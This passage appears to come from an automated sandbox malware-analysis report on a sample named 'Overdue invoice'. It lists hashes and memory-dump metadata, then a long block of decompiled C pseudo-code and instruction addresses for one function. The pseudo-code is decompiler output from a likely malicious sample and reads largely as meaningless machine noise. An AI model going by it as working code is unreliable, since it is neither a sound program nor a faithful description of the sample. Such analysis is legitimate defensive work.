                                                                          • Opcode Fuzzy Hash: 2f6f911da081cd251ce57f9abbfa11ebe45e725072656756c74580ca8e35372e
                                                                          • Instruction Fuzzy Hash: 06910374E2424ACFCB04CFA9D5849AEFBF1FF89214F24956AD415AB324D374AA42CF50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 072683C8 Relevance: 1.4, Strings: 1, Instructions: 136COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.304428797.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7260000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ;Gqs
                                                                          • API String ID: 0-2358465480
                                                                          • Opcode ID: ab68556cf090633c4810d56c8a7a8ae496ad1da839c836dbfd2489ec517d349b
                                                                          • Instruction ID: dd158063e62938ad984fc1de107dce940e7d78dd3f85cae3dc89ed4c7cd5f81e
                                                                          • Opcode Fuzzy Hash: ab68556cf090633c4810d56c8a7a8ae496ad1da839c836dbfd2489ec517d349b
                                                                          • Instruction Fuzzy Hash: 1F513BB0E11209DFCB14CFA9C4442AEFBF2FB89310F14C16AC415A7354D7345A828F55
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00524DB1 Relevance: .6, Instructions: 555COMMONCrypto
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 73%
                                                                          			E00524DB1(signed int __eax, signed int* __ebx, signed int __ecx, signed int __edx, signed int* __edi, signed int* __esi) {
				signed char _t68;
				signed char _t70;
				signed int _t71;
				signed char _t73;
				intOrPtr* _t74;
				signed char _t76;
				intOrPtr* _t77;
				signed char _t79;
				intOrPtr* _t80;
				signed char _t82;
				intOrPtr* _t83;
				signed char _t85;
				intOrPtr* _t86;
				signed char _t88;
				intOrPtr* _t89;
				intOrPtr* _t91;
				intOrPtr* _t93;
				signed char _t95;
				intOrPtr* _t96;
				signed char _t98;
				intOrPtr* _t99;
				intOrPtr* _t100;
				intOrPtr* _t101;
				intOrPtr* _t103;
				intOrPtr* _t105;
				intOrPtr* _t107;
				signed char _t109;
				intOrPtr* _t110;
				intOrPtr* _t112;
				intOrPtr* _t114;
				intOrPtr* _t115;
				intOrPtr* _t116;
				signed char _t122;
				signed char _t123;
				void* _t124;
				intOrPtr* _t125;
				intOrPtr* _t127;
				void* _t128;
				intOrPtr* _t130;
				signed char _t131;
				signed int _t132;
				signed char _t133;
				signed char _t134;
				signed char _t136;
				signed char _t137;
				signed char _t140;
				signed char _t143;
				signed char _t144;
				intOrPtr* _t145;
				intOrPtr* _t146;
				signed char _t147;
				signed char _t148;
				intOrPtr* _t149;
				signed char _t150;
				signed char _t152;
				signed char _t153;
				intOrPtr* _t154;
				intOrPtr* _t156;
				intOrPtr* _t157;
				signed char _t164;
				intOrPtr* _t165;
				signed char _t167;
				intOrPtr* _t168;
				signed char _t170;
				void* _t177;
				void* _t178;
				void* _t179;
				void* _t180;
				void* _t181;
				void* _t182;
				void* _t183;
				void* _t184;
				void* _t185;
				void* _t186;
				void* _t187;
				signed int* _t188;
				signed int _t189;
				void* _t191;
				void* _t192;
				signed char _t194;
				signed char _t195;
				signed char _t196;
				signed char _t197;
				signed int _t205;
				signed int* _t206;
				signed int _t212;
				signed int* _t216;
				signed int _t217;
				signed int _t218;
				void* _t219;
				void* _t221;
				void* _t229;

				_t216 = __esi;
				_t205 = __edx;
				asm("sti");
				_push(cs);
				_t218 = _t217 |  *__ebx;
				 *__edi =  *__edi & __eax;
				_t194 = __ecx & __edx;
				asm("invalid");
				_push(cs);
				 *_t194 =  *_t194 + 1;
				asm("sbb [edi+0x2b0b0efb], cl");
				_push(cs);
				_t68 = __eax | 0xfffffffffb8f2f29 |  *__edx;
				 *__ebx =  *__ebx - _t68;
				 *__esi =  *__esi + _t68;
				_t70 = (_t68 |  *__esi) -  *(_t68 |  *__esi);
				 *_t70 =  *_t70 + _t70;
				asm("adc esi, [eax]");
				 *_t70 =  *_t70 | _t70;
				_t71 = _t70 ^  *_t70;
				 *_t71 =  *_t71 + _t71;
				asm("sbb al, [eax]");
				 *_t194 =  *_t194 + __edx;
				__esi[0xa3c614e] = __esi[0xa3c614e] & __edx;
				asm("int 0x0");
				 *__esi =  *__esi + _t71;
				 *((intOrPtr*)(__edx + 0x200a0000)) =  *((intOrPtr*)(__edx + 0x200a0000)) - __ebx;
				asm("arpl [edx], di");
				_t195 = _t194 - _t194;
				 *_t71 =  *_t71 + _t71;
				 *_t71 =  *_t71 & _t71;
				 *_t71 =  *_t71 + _t71;
				 *((intOrPtr*)(_t219 + __edx)) =  *((intOrPtr*)(_t219 + __edx)) + __edx;
				ss = es;
				 *_t195 =  *_t195 + _t71;
				_t73 = (_t71 & 0x6fa20216) -  *(_t71 & 0x6fa20216);
				 *0xa0a0000 =  *0xa0a0000 + __edx;
				 *_t195 =  *_t195 ^ _t73;
				 *0x1a000000 =  *0x1a000000 + _t195;
				 *_t73 =  *_t73 + _t73;
				asm("adc [edx], eax");
				 *((intOrPtr*)(_t195 + 0x280a0000)) =  *((intOrPtr*)(_t195 + 0x280a0000)) - __edx;
				_t221 = es;
				 *_t73 =  *_t73 + _t73;
				_push(es);
				_push(es);
				_t74 = _t73 -  *_t73;
				 *_t74 =  *_t74 + _t74;
				_push(ds);
				_t177 = 0xa0a0000 +  *0x0A0A0035;
				 *_t74 =  *_t74 + _t74;
				_t76 = _t74 + 0x0000002a &  *__edx;
				 *_t76 =  *_t76 + _t76;
				_t77 = _t76 + 0x2a;
				 *_t77 =  *_t77 + _t77;
				 *__esi =  *__esi + _t177;
				_t178 = _t177 +  *0x0A0A0036;
				 *_t77 =  *_t77 + _t77;
				_t79 = _t77 + 0x0000002a &  *__edx;
				 *_t79 =  *_t79 + _t79;
				_t80 = _t79 + 0x2a;
				 *_t80 =  *_t80 + _t80;
				 *__esi =  *__esi + _t178;
				_t179 = _t178 +  *0x0A0A0037;
				 *_t80 =  *_t80 + _t80;
				_t82 = _t80 + 0x0000002a &  *__edx;
				 *_t82 =  *_t82 + _t82;
				_t83 = _t82 + 0x2a;
				 *_t83 =  *_t83 + _t83;
				 *__esi =  *__esi + _t179;
				_t180 = _t179 +  *0x0A0A0038;
				 *_t83 =  *_t83 + _t83;
				_t85 = _t83 + 0x0000002a &  *__edx;
				 *_t85 =  *_t85 + _t85;
				_t86 = _t85 + 0x2a;
				 *_t86 =  *_t86 + _t86;
				 *__esi =  *__esi + _t180;
				_t181 = _t180 +  *0x0A0A0039;
				 *_t86 =  *_t86 + _t86;
				_t88 = _t86 + 0x0000002a &  *__edx;
				_t212 = __edi +  *((intOrPtr*)(_t218 + 0x35)) +  *((intOrPtr*)(_t218 + 0x36)) +  *((intOrPtr*)(_t218 + 0x37)) +  *((intOrPtr*)(_t218 + 0x38)) +  *((intOrPtr*)(_t218 + 0x39));
				 *_t88 =  *_t88 + _t88;
				_t89 = _t88 + 0x2a;
				 *_t89 =  *_t89 + _t89;
				 *__esi =  *__esi + _t181;
				_t182 = _t181 +  *0x0A0A003A;
				 *_t89 =  *_t89 + _t89;
				asm("adc esi, [eax]");
				_t91 = _t89 + 0x2a +  *((intOrPtr*)(_t89 + 0x2a));
				asm("aaa");
				 *_t91 =  *_t91 + _t91;
				 *_t91 =  *_t91 + _t195;
				 *_t91 =  *_t91 + _t91;
				asm("adc [edx], eax");
				 *__esi =  *__esi + 1;
				_push(0xa0a0000);
				 *_t91 =  *_t91 + _t91;
				_push(es);
				if( *_t91 >= 0) {
					L4:
					_push(es);
					asm("outsd");
					 *_t205 =  *_t205 + _t195;
					_t93 = _t91 -  *_t91 -  *((intOrPtr*)(_t91 -  *_t91));
					_push(ds);
					_t183 = _t182 +  *((intOrPtr*)(_t182 + 0x3b));
					 *_t93 =  *_t93 + _t93;
					_t95 = _t93 + 0x0000002a &  *_t205;
					 *_t95 =  *_t95 + _t95;
					_t96 = _t95 + 0x2a;
					 *_t96 =  *_t96 + _t96;
					 *_t216 =  *_t216 + _t183;
					_t184 = _t183 +  *((intOrPtr*)(_t183 + 0x3c));
					 *_t96 =  *_t96 + _t96;
					_t98 = _t96 + 0x0000002a &  *_t205;
					_t212 = _t212 +  *((intOrPtr*)(_t218 + 0x3b)) +  *((intOrPtr*)(_t218 + 0x3c));
					 *_t98 =  *_t98 + _t98;
					_t99 = _t98 + 0x2a;
					goto L5;
				} else {
					 *_t91 =  *_t91 + _t91;
					_t195 = _t195 |  *__edx;
					_t184 = _t182 +  *((intOrPtr*)(0xa0a003a));
					 *_t91 =  *_t91 + _t91;
					_pop(es);
					_pop(es);
					_push(es);
					asm("outsd");
					 *__edx =  *__edx + _t195;
					_t99 = _t91 + 0xb - 7 -  *((intOrPtr*)(_t91 + 0xb - 7)) +  *0xa0a0000;
					if(_t99 >= 0) {
						L5:
						_t100 = _t99 -  *_t99;
						 *_t100 =  *_t100 + _t100;
						_push(ds);
						_t185 = _t184 +  *((intOrPtr*)(_t184 + 0x3d));
						_t229 = _t185;
					} else {
						 *_t99 =  *_t99 + _t99;
						_t100 = _t99 + 2;
						if(_t100 == 0) {
							 *_t100 =  *_t100 + _t100;
							_pop(es);
							_t91 = _t100 + 0xb - 7;
							_pop(es);
							goto L4;
						}
					}
				}
				if(_t229 == 0) {
					 *_t100 =  *_t100 + _t100;
					_t164 = _t100 + 0x0000002a &  *_t205;
					 *_t164 =  *_t164 + _t164;
					_t165 = _t164 + 0x2a;
					 *_t165 =  *_t165 + _t165;
					 *_t216 =  *_t216 + _t185;
					_t191 = _t185 +  *((intOrPtr*)(_t185 + 0x3e));
					 *_t165 =  *_t165 + _t165;
					_t167 = _t165 + 0x0000002a &  *_t205;
					 *_t167 =  *_t167 + _t167;
					_t168 = _t167 + 0x2a;
					 *_t168 =  *_t168 + _t168;
					 *_t216 =  *_t216 + _t191;
					_t192 = _t191 +  *((intOrPtr*)(_t191 + 0x3f));
					 *_t168 =  *_t168 + _t168;
					_t170 = _t168 + 0x0000002a &  *_t205;
					_t212 = _t212 +  *((intOrPtr*)(_t218 + 0x3d)) +  *((intOrPtr*)(_t218 + 0x3e)) +  *((intOrPtr*)(_t218 + 0x3f));
					 *_t170 =  *_t170 + _t170;
					_t100 = _t170 + 0x2a;
					 *_t100 =  *_t100 + _t100;
					 *_t216 =  *_t216 + _t192;
					_t185 = _t192 +  *((intOrPtr*)(_t192 + 0x40));
					 *_t100 =  *_t100 + _t100;
				}
				 *((intOrPtr*)(_t205 + _t218)) =  *((intOrPtr*)(_t205 + _t218)) + _t100;
				asm("adc esi, [eax]");
				_t101 = _t100 +  *_t100;
				asm("aaa");
				 *_t101 =  *_t101 + _t101;
				 *_t101 =  *_t101 + _t195;
				 *_t101 =  *_t101 + _t101;
				asm("adc [edx], eax");
				 *_t216 =  *_t216 + 1;
				_push(_t221);
				 *_t101 =  *_t101 + _t101;
				_push(es);
				if( *_t101 >= 0) {
					L12:
					_push(es);
					asm("outsd");
					 *_t205 =  *_t205 + _t195;
					_t103 = _t101 -  *_t101 -  *((intOrPtr*)(_t101 -  *_t101));
					_push(ds);
					_t186 = _t185 +  *((intOrPtr*)(_t185 + 0x41));
					 *_t103 =  *_t103 + _t103;
					asm("adc esi, [eax]");
					_t105 = _t103 + 0x2a +  *((intOrPtr*)(_t103 + 0x2a));
					asm("aaa");
					 *_t105 =  *_t105 + _t105;
					 *_t105 =  *_t105 + _t195;
					 *_t105 =  *_t105 + _t105;
					asm("adc [edx], eax");
					 *_t216 =  *_t216 + 1;
					_push(_t218);
					 *_t105 =  *_t105 + _t105;
					_push(es);
					if( *_t105 >= 0) {
						goto L18;
					} else {
						 *_t105 =  *_t105 + _t105;
						_t195 = _t195 |  *_t205;
						_t188 = _t186 +  *((intOrPtr*)(_t186 + 0x41));
						 *_t105 =  *_t105 + _t105;
						_pop(es);
						_t156 = _t105 + 0xb - 7;
						goto L14;
					}
				} else {
					 *_t101 =  *_t101 + _t101;
					_t195 = _t195 |  *_t205;
					_t188 = _t185 +  *((intOrPtr*)(_t185 + 0x40));
					 *_t101 =  *_t101 + _t101;
					_pop(es);
					_pop(es);
					_push(es);
					asm("outsd");
					 *_t205 =  *_t205 + _t195;
					_t156 = _t101 + 0xb - 7 -  *((intOrPtr*)(_t101 + 0xb - 7)) +  *_t188;
					if(_t156 >= 0) {
						L14:
						_pop(es);
						_pop(es);
						_push(es);
						asm("outsd");
						_t157 = _t156 -  *_t156;
						goto L15;
					} else {
						 *_t156 =  *_t156 + _t156;
						_t157 = _t156 + 2;
						if(_t157 != 0) {
							L15:
							 *_t205 =  *_t205 + _t195;
							_t112 = _t157 +  *_t188;
							if(_t112 >= 0) {
								L20:
								_push(_t216);
								 *_t112 =  *_t112 + _t112;
								_push(es);
								if( *_t112 >= 0) {
									goto L25;
								} else {
									goto L21;
								}
							} else {
								 *_t112 =  *_t112 + _t112;
								_t112 = _t112 + 2;
								if(_t112 != 0) {
									L21:
									 *_t112 =  *_t112 + _t112;
									_t195 = _t195 |  *_t205;
									_t188 = _t188 + _t188[0x10];
									L22:
									 *_t110 =  *_t110 + _t110;
									_pop(es);
									_pop(es);
									_push(es);
									asm("outsd");
									 *_t205 =  *_t205 + _t195;
									_t110 = _t110 + 0xb - 7 -  *((intOrPtr*)(_t110 + 0xb - 7)) +  *_t188;
									if(_t110 >= 0) {
										L26:
										 *_t110 =  *_t110 + _t110;
										asm("adc [edx], eax");
										 *_t216 =  *_t216 + 1;
									} else {
										 *_t110 =  *_t110 + _t110;
										_t110 = _t110 + 2;
										if(_t110 == 0) {
											 *_t110 =  *_t110 + _t110;
											_pop(es);
											_t112 = _t110 + 0xb - 7;
											_pop(es);
											L25:
											_push(es);
											asm("outsd");
											 *_t205 =  *_t205 + _t195;
											_t114 = _t112 -  *_t112 -  *((intOrPtr*)(_t112 -  *_t112));
											asm("o16 add ch, [eax]");
											 *_t195 =  *_t195 + _t114;
											 *_t216 =  *_t216 + _t114;
											_t205 = _t205 + _t188[3];
											 *_t114 =  *_t114 + _t114;
											_push(es);
											asm("outsd");
											 *_t216 =  *_t216 + _t114;
											_t115 = _t114 +  *_t188;
											asm("outsd");
											 *_t216 =  *_t216 + _t115;
											_t116 = _t115 -  *_t115;
											 *_t216 = _t188 +  *_t216;
											_t188 = _t188 + _t188[0x11];
											 *_t116 =  *_t116 + _t116;
											asm("adc esi, [eax]");
											_t110 = _t116 + 0x2a +  *((intOrPtr*)(_t116 + 0x2a));
											_push(_t205);
											 *_t110 =  *_t110 + _t110;
											 *_t216 = _t188 +  *_t216;
											goto L26;
										}
									}
								} else {
									 *_t112 =  *_t112 + _t112;
									_pop(es);
									_t105 = _t112 + 0xb - 7;
									_pop(es);
									L18:
									_push(es);
									asm("outsd");
									 *_t205 =  *_t205 + _t195;
									_t107 = _t105 -  *_t105 -  *((intOrPtr*)(_t105 -  *_t105));
									_push(ds);
									_t187 = _t186 +  *((intOrPtr*)(_t186 + 0x42));
									 *_t107 =  *_t107 + _t107;
									_t109 = _t107 + 0x0000002a &  *_t205;
									_t212 = _t212 +  *((intOrPtr*)(_t218 + 0x42));
									 *_t109 =  *_t109 + _t109;
									_t110 = _t109 + 0x2a;
									 *_t110 =  *_t110 + _t110;
									 *_t216 =  *_t216 + _t187;
									_t188 = _t187 +  *((intOrPtr*)(_t187 + 0x43));
									 *_t110 =  *_t110 + _t110;
									L19:
									asm("adc esi, [eax]");
									_t112 = _t110 + 0x2a +  *((intOrPtr*)(_t110 + 0x2a));
									asm("aaa");
									 *_t112 =  *_t112 + _t112;
									 *_t112 =  *_t112 + _t195;
									 *_t112 =  *_t112 + _t112;
									asm("adc [edx], eax");
									 *_t216 =  *_t216 + 1;
									goto L20;
								}
							}
						} else {
							 *_t157 =  *_t157 + _t157;
							_pop(es);
							_t101 = _t157 + 0xb - 7;
							_pop(es);
							goto L12;
						}
					}
				}
				 *_t110 = _t110;
				 *_t216 =  *_t216 + _t110;
				if( *_t216 >= 0) {
					goto L19;
				}
				 *_t110 =  *_t110 + _t110;
				_t195 = _t195 |  *_t205;
				_t188 = _t188 + _t205;
				_push(es);
				 *_t110 = _t110;
				 *_t216 =  *_t216 + _t110;
				if( *_t216 >= 0) {
					goto L22;
				}
				 *_t110 =  *_t110 + _t110;
				_t196 = _t195 |  *_t188;
				_t189 = _t188 + _t188[0x11];
				 *_t110 =  *_t110 + _t110;
				_t122 = _t110 + 0xc;
				 *(_t216 + _t196) =  *(_t216 + _t196) | _t196;
				 *_t216 =  *_t216 | _t122;
				asm("outsd");
				_t123 = _t122 +  *_t196;
				 *_t216 =  *_t216 + _t123;
				 *_t212 =  *_t212 | _t123;
				asm("outsd");
				_t124 = _t123 + 1;
				 *_t216 =  *_t216 + _t124;
				_t125 = _t124 +  *_t189;
				if(_t125 >= 0) {
					L32:
					_t127 = _t125 +  *((intOrPtr*)(_t125 + _t218)) + 0x2a060001;
				} else {
					 *_t125 =  *_t125 + _t125;
					_t127 = _t125 + 2;
					if(_t127 == 0) {
						 *_t127 =  *_t127 + _t127;
						_t148 = _t127 + 0xc;
						 *(_t216 + _t196) =  *(_t216 + _t196) | _t196;
						 *_t216 =  *_t216 | _t148;
						asm("outsd");
						 *_t196 =  *_t196 + _t148;
						 *_t216 =  *_t216 + _t148;
						 *_t212 =  *_t212 | _t148;
						asm("outsd");
						_t149 = _t148 +  *_t196;
						 *_t216 =  *_t216 + _t149;
						_t150 = _t149 -  *_t149;
						 *_t189 =  *_t189 + _t205;
						 *_t196 =  *_t196 ^ _t150;
						 *_t196 =  *_t196 + _t196;
						 *_t150 =  *_t150 + _t150;
						 *_t212 =  *_t212 + _t189;
						 *_t150 =  *_t150 + _t150;
						asm("adc [edx], eax");
						asm("outsd");
						 *_t216 =  *_t216 + _t150;
						_t152 = (_t150 |  *_t216) -  *(_t150 |  *_t216);
						 *_t152 =  *_t152 + _t152;
						_t153 = _t152 &  *_t205;
						_t218 = _t218 +  *((intOrPtr*)(_t212 - 0x7b));
						 *_t153 =  *_t153 + _t153;
						_push(es);
						_t154 = _t153 -  *_t153;
						 *_t154 =  *_t154 + _t154;
						_t125 = _t154 +  *[es:edx];
						goto L32;
					}
				}
				_t128 = _t127 -  *_t127;
				 *_t216 =  *_t216 + _t128;
				_t130 = _t128 +  *_t205 + 0x28;
				es = es;
				 *_t130 =  *_t130 + _t130;
				_push(es);
				_t131 = _t130 -  *_t130;
				 *_t216 =  *_t216 + _t189;
				_t197 = _t196 +  *_t131;
				_t132 = _t131 &  *_t131;
				 *_t205 =  *_t205 + _t197;
				_t206 = _t205 -  *_t189;
				 *_t189 =  *_t189 ^ _t132;
				 *_t197 =  *_t197 + _t197;
				 *_t132 =  *_t132 + _t132;
				 *_t132 =  *_t132 + _t132;
				 *_t132 =  *_t132 + _t132;
				asm("adc [edx], eax");
				if( *_t132 != 0) {
					L37:
					_t133 = _t132 ^  *_t132;
					 *_t197 =  *_t197 + _t133;
					_t134 = _t133 | 0x00000002;
					if(_t134 < 0) {
						goto L42;
					} else {
						 *_t134 =  *_t134 + _t134;
						_t136 = _t134 + 8;
						_pop(es);
						 *0xa2b0000 =  *0xa2b0000 - _t136;
						es = es;
						_t189 = _t189 ^ _t212;
						goto L39;
					}
				} else {
					 *_t132 =  *_t132 + _t132;
					_push(es);
					_t143 = _t132 + 0x0000000a |  *_t212;
					_t218 = _t218 +  *_t143;
					_t144 = _t143 ^  *_t143;
					 *_t197 =  *_t197 + _t144;
					_t136 = _t144 | 0x00000002;
					if(_t136 < 0) {
						L39:
						asm("fild qword [edx]");
						 *_t136 =  *_t136 + _t136;
						 *_t189 = _t206 +  *_t189;
						 *_t189 =  *_t189 ^ _t136;
						 *_t136 =  *_t136 + _t189;
						 *_t136 =  *_t136 + _t136;
						 *_t197 =  *_t197 + _t136;
						 *_t136 =  *_t136 + _t136;
						asm("adc [edx], eax");
						if( *_t136 == 0) {
							 *_t136 =  *_t136 + _t136;
							_push(es);
							_push(es);
							_t140 = _t136 + 0xa - 0xd +  *_t189;
							if(_t140 >= 0) {
								goto L36;
							} else {
								 *_t140 =  *_t140 + _t140;
								 *_t140 =  *_t140 + _t140;
								_pop(ss);
								asm("outsd");
								_t134 = _t197 |  *(_t212 - 0x40) |  *_t206;
								 *_t134 =  *_t134 + _t134;
								_push(es);
								asm("rol dword [eax], 0x0");
								_t197 = _t140 +  *_t134 |  *_t206;
								L42:
								 *_t189 = _t206 +  *_t189;
								 *_t197 =  *_t197 ^ _t134;
								 *((intOrPtr*)(_t134 + _t134)) =  *((intOrPtr*)(_t134 + _t134)) + _t197;
								 *_t134 =  *_t134 + _t134;
								_pop(es);
								 *_t134 =  *_t134 + _t134;
								asm("adc [ebx], eax");
								_t136 = (_t134 |  *_t216) - 6;
								 *_t136 =  *_t136 + _t136;
								_push(es);
								_t197 = _t197 +  *((intOrPtr*)(_t212 - 0x74)) -  *_t189;
								 *_t206 =  *_t206 ^ _t136;
								 *_t197 = _t206 +  *_t197;
								 *_t136 =  *_t136 + _t136;
								 *_t136 =  *_t136 + _t136;
							}
						}
					} else {
						 *_t136 =  *_t136 + _t136;
						_t145 = _t136 + 8;
						_pop(es);
						 *0xa2b0000 =  *0xa2b0000 - _t145;
						es = es;
						_t146 = _t145 -  *_t145;
						 *_t146 =  *_t146 + _t146;
						asm("adc esi, [eax]");
						_t147 = _t146 +  *_t146;
						 *_t147 =  *_t147 - _t147;
						 *_t147 =  *_t147 + _t147;
						 *_t147 =  *_t147 & _t147;
						 *_t197 = _t206 +  *_t197;
						_t189 = (_t189 ^ _t212) +  *((intOrPtr*)((_t189 ^ _t212) + 0x46));
						 *_t147 =  *_t147 + _t147;
						_t140 = _t147 + 0xa;
						L36:
						_t132 = _t140 |  *_t216 |  *_t212;
						_t218 = _t218 +  *_t132;
						_t216 = 0x740a0000;
						goto L37;
					}
				}
				 *_t136 =  *_t136 + _t136;
				 *_t206 =  *_t206 + _t136;
				_push(ss);
				asm("outsd");
				_t137 = _t197;
				 *_t137 =  *_t137 + _t137;
				_push(es);
				asm("fiadd word [edi]");
				return _t137;
			}































































































                                                                          0x00524db1
                                                                          0x00524db1
                                                                          0x00524db1
                                                                          0x00524db2
                                                                          0x00524db3
                                                                          0x00524db5
                                                                          0x00524db7
                                                                          0x00524db9
                                                                          0x00524dbb
                                                                          0x00524dbc
                                                                          0x00524dc3
                                                                          0x00524dce
                                                                          0x00524dcf
                                                                          0x00524dd1
                                                                          0x00524dd4
                                                                          0x00524dd8
                                                                          0x00524dda
                                                                          0x00524ddc
                                                                          0x00524dde
                                                                          0x00524de0
                                                                          0x00524de2
                                                                          0x00524de4
                                                                          0x00524de6
                                                                          0x00524de8
                                                                          0x00524dee
                                                                          0x00524df0
                                                                          0x00524df2
                                                                          0x00524df8
                                                                          0x00524dfc
                                                                          0x00524dfe
                                                                          0x00524e01
                                                                          0x00524e03
                                                                          0x00524e05
                                                                          0x00524e08
                                                                          0x00524e0c
                                                                          0x00524e19
                                                                          0x00524e1b
                                                                          0x00524e1d
                                                                          0x00524e1f
                                                                          0x00524e25
                                                                          0x00524e27
                                                                          0x00524e29
                                                                          0x00524e2f
                                                                          0x00524e30
                                                                          0x00524e32
                                                                          0x00524e33
                                                                          0x00524e34
                                                                          0x00524e36
                                                                          0x00524e38
                                                                          0x00524e39
                                                                          0x00524e3c
                                                                          0x00524e40
                                                                          0x00524e45
                                                                          0x00524e47
                                                                          0x00524e49
                                                                          0x00524e4b
                                                                          0x00524e4d
                                                                          0x00524e50
                                                                          0x00524e54
                                                                          0x00524e59
                                                                          0x00524e5b
                                                                          0x00524e5d
                                                                          0x00524e5f
                                                                          0x00524e61
                                                                          0x00524e64
                                                                          0x00524e68
                                                                          0x00524e6d
                                                                          0x00524e6f
                                                                          0x00524e71
                                                                          0x00524e73
                                                                          0x00524e75
                                                                          0x00524e78
                                                                          0x00524e7c
                                                                          0x00524e81
                                                                          0x00524e83
                                                                          0x00524e85
                                                                          0x00524e87
                                                                          0x00524e89
                                                                          0x00524e8c
                                                                          0x00524e90
                                                                          0x00524e92
                                                                          0x00524e95
                                                                          0x00524e97
                                                                          0x00524e99
                                                                          0x00524e9b
                                                                          0x00524e9d
                                                                          0x00524ea0
                                                                          0x00524ea4
                                                                          0x00524ea6
                                                                          0x00524ea8
                                                                          0x00524ea9
                                                                          0x00524eab
                                                                          0x00524ead
                                                                          0x00524eaf
                                                                          0x00524eb1
                                                                          0x00524eb3
                                                                          0x00524eb4
                                                                          0x00524eb6
                                                                          0x00524eb7
                                                                          0x00524ee0
                                                                          0x00524ee0
                                                                          0x00524ee1
                                                                          0x00524ee4
                                                                          0x00524ee6
                                                                          0x00524ee8
                                                                          0x00524ee9
                                                                          0x00524eec
                                                                          0x00524ef0
                                                                          0x00524ef5
                                                                          0x00524ef7
                                                                          0x00524ef9
                                                                          0x00524efb
                                                                          0x00524efd
                                                                          0x00524f00
                                                                          0x00524f04
                                                                          0x00524f06
                                                                          0x00524f09
                                                                          0x00524f0b
                                                                          0x00000000
                                                                          0x00524eb9
                                                                          0x00524eb9
                                                                          0x00524ebb
                                                                          0x00524ebd
                                                                          0x00524ec0
                                                                          0x00524ec4
                                                                          0x00524ec7
                                                                          0x00524ec8
                                                                          0x00524ec9
                                                                          0x00524ecc
                                                                          0x00524ece
                                                                          0x00524ed0
                                                                          0x00524f0c
                                                                          0x00524f0c
                                                                          0x00524f0e
                                                                          0x00524f10
                                                                          0x00524f11
                                                                          0x00524f11
                                                                          0x00524ed2
                                                                          0x00524ed2
                                                                          0x00524ed4
                                                                          0x00524ed6
                                                                          0x00524ed8
                                                                          0x00524edc
                                                                          0x00524edd
                                                                          0x00524edf
                                                                          0x00000000
                                                                          0x00524edf
                                                                          0x00524ed6
                                                                          0x00524ed0
                                                                          0x00524f12
                                                                          0x00524f14
                                                                          0x00524f18
                                                                          0x00524f1d
                                                                          0x00524f1f
                                                                          0x00524f21
                                                                          0x00524f23
                                                                          0x00524f25
                                                                          0x00524f28
                                                                          0x00524f2c
                                                                          0x00524f31
                                                                          0x00524f33
                                                                          0x00524f35
                                                                          0x00524f37
                                                                          0x00524f39
                                                                          0x00524f3c
                                                                          0x00524f40
                                                                          0x00524f42
                                                                          0x00524f45
                                                                          0x00524f47
                                                                          0x00524f49
                                                                          0x00524f4b
                                                                          0x00524f4d
                                                                          0x00524f50
                                                                          0x00524f50
                                                                          0x00524f51
                                                                          0x00524f54
                                                                          0x00524f56
                                                                          0x00524f58
                                                                          0x00524f59
                                                                          0x00524f5b
                                                                          0x00524f5d
                                                                          0x00524f5f
                                                                          0x00524f61
                                                                          0x00524f63
                                                                          0x00524f64
                                                                          0x00524f66
                                                                          0x00524f67
                                                                          0x00524f90
                                                                          0x00524f90
                                                                          0x00524f91
                                                                          0x00524f94
                                                                          0x00524f96
                                                                          0x00524f98
                                                                          0x00524f99
                                                                          0x00524f9c
                                                                          0x00524fa0
                                                                          0x00524fa2
                                                                          0x00524fa4
                                                                          0x00524fa5
                                                                          0x00524fa7
                                                                          0x00524fa9
                                                                          0x00524fab
                                                                          0x00524fad
                                                                          0x00524faf
                                                                          0x00524fb0
                                                                          0x00524fb2
                                                                          0x00524fb3
                                                                          0x00000000
                                                                          0x00524fb5
                                                                          0x00524fb5
                                                                          0x00524fb7
                                                                          0x00524fb9
                                                                          0x00524fbc
                                                                          0x00524fc0
                                                                          0x00524fc1
                                                                          0x00000000
                                                                          0x00524fc1
                                                                          0x00524f69
                                                                          0x00524f69
                                                                          0x00524f6b
                                                                          0x00524f6d
                                                                          0x00524f70
                                                                          0x00524f74
                                                                          0x00524f77
                                                                          0x00524f78
                                                                          0x00524f79
                                                                          0x00524f7c
                                                                          0x00524f7e
                                                                          0x00524f80
                                                                          0x00524fc2
                                                                          0x00524fc2
                                                                          0x00524fc3
                                                                          0x00524fc4
                                                                          0x00524fc5
                                                                          0x00524fc6
                                                                          0x00000000
                                                                          0x00524f82
                                                                          0x00524f82
                                                                          0x00524f84
                                                                          0x00524f86
                                                                          0x00524fc8
                                                                          0x00524fc8
                                                                          0x00524fca
                                                                          0x00524fcc
                                                                          0x0052500f
                                                                          0x0052500f
                                                                          0x00525010
                                                                          0x00525012
                                                                          0x00525013
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00524fce
                                                                          0x00524fce
                                                                          0x00524fd0
                                                                          0x00524fd2
                                                                          0x00525015
                                                                          0x00525015
                                                                          0x00525017
                                                                          0x00525019
                                                                          0x0052501c
                                                                          0x0052501c
                                                                          0x00525020
                                                                          0x00525023
                                                                          0x00525024
                                                                          0x00525025
                                                                          0x00525028
                                                                          0x0052502a
                                                                          0x0052502c
                                                                          0x00525071
                                                                          0x00525071
                                                                          0x00525073
                                                                          0x00525075
                                                                          0x0052502e
                                                                          0x0052502e
                                                                          0x00525030
                                                                          0x00525032
                                                                          0x00525034
                                                                          0x00525038
                                                                          0x00525039
                                                                          0x0052503b
                                                                          0x0052503c
                                                                          0x0052503c
                                                                          0x0052503d
                                                                          0x00525040
                                                                          0x00525042
                                                                          0x00525044
                                                                          0x00525047
                                                                          0x00525049
                                                                          0x0052504b
                                                                          0x0052504e
                                                                          0x00525050
                                                                          0x00525051
                                                                          0x00525054
                                                                          0x00525056
                                                                          0x00525058
                                                                          0x0052505b
                                                                          0x0052505d
                                                                          0x0052505f
                                                                          0x00525061
                                                                          0x00525064
                                                                          0x00525068
                                                                          0x0052506a
                                                                          0x0052506c
                                                                          0x0052506d
                                                                          0x0052506f
                                                                          0x00000000
                                                                          0x0052506f
                                                                          0x00525032
